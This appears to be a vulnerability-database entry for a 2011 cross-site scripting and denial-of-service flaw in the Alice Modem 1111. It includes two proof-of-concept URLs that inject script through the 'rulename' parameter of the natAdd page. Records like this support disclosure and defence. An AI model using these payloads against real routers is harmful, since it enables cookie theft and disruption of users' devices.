ID
VAR-E-201107-0447
EDB ID
35939
TITLE
Alice Modem 1111 - 'rulename' Cross-Site Scripting / Denial of Service - Hardware dos Exploit
Trust: 0.6
DESCRIPTION
Alice Modem 1111 - 'rulename' Cross-Site Scripting / Denial of Service.. dos exploit for Hardware platform
Trust: 0.6
AFFECTED PRODUCTS
vendor: | alice | model: | modem | scope: | eq | version: | 1111 | Trust: 1.3 |
EXPLOIT
source: https://www.securityfocus.com/bid/48642/info
The Alice Modem is prone to a cross-site scripting vulnerability and a denial-of-service vulnerability because the device fails to properly handle user-supplied input.
An attacker may leverage these issues to cause a denial-of-service condition or to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. Successfully exploiting the cross-site scripting issue may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/natAdd?apptype=userdefined&rulename=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E&waninterface=ipwan&inthostip1=192&inthostip2=168&inthostip3=1&inthostip4=99
http://www.example.com/natAdd?apptype=userdefined&rulename=%3E%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%3Cx+y=&waninterface=ipwan&inthostip1=192&inthostip2=168&inthostip3=1&inthostip4=199&protocol1=proto_6&extportstart1=1&extportend1=1&intportstart1=1&intportend1=1&protocol2=proto_6&extportstart2=&extportend2=&intportstart2=&intportend2=&protocol3=proto_6&extportstart3=&extportend3=&intportstart3=&intportend3=
Trust: 1.0
EXPLOIT LANGUAGE
txt
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
'rulename' Cross-Site Scripting / Denial of Service
Trust: 1.0
CREDITS
Moritz Naumann
Trust: 0.6
EXTERNAL IDS
db: | BID | id: | 48642 | Trust: 1.9 |
db: | EXPLOIT-DB | id: | 35939 | Trust: 1.6 |
db: | EDBNET | id: | 57318 | Trust: 0.6 |
REFERENCES
url: | https://www.securityfocus.com/bid/48642/info | Trust: 1.0 |
url: | https://www.exploit-db.com/exploits/35939/ | Trust: 0.6 |
url: | https://www.alice-dsl.de | Trust: 0.3 |
SOURCES
db: | BID | id: | 48642 |
db: | EXPLOIT-DB | id: | 35939 |
db: | EDBNET | id: | 57318 |
LAST UPDATE DATE
2022-07-27T09:47:46.706000+00:00
SOURCES UPDATE DATE
db: | BID | id: | 48642 | date: | 2015-03-19T08:25:00 |
SOURCES RELEASE DATE
db: | BID | id: | 48642 | date: | 2011-07-12T00:00:00 |
db: | EXPLOIT-DB | id: | 35939 | date: | 2011-07-12T00:00:00 |
db: | EDBNET | id: | 57318 | date: | 2011-07-12T00:00:00 |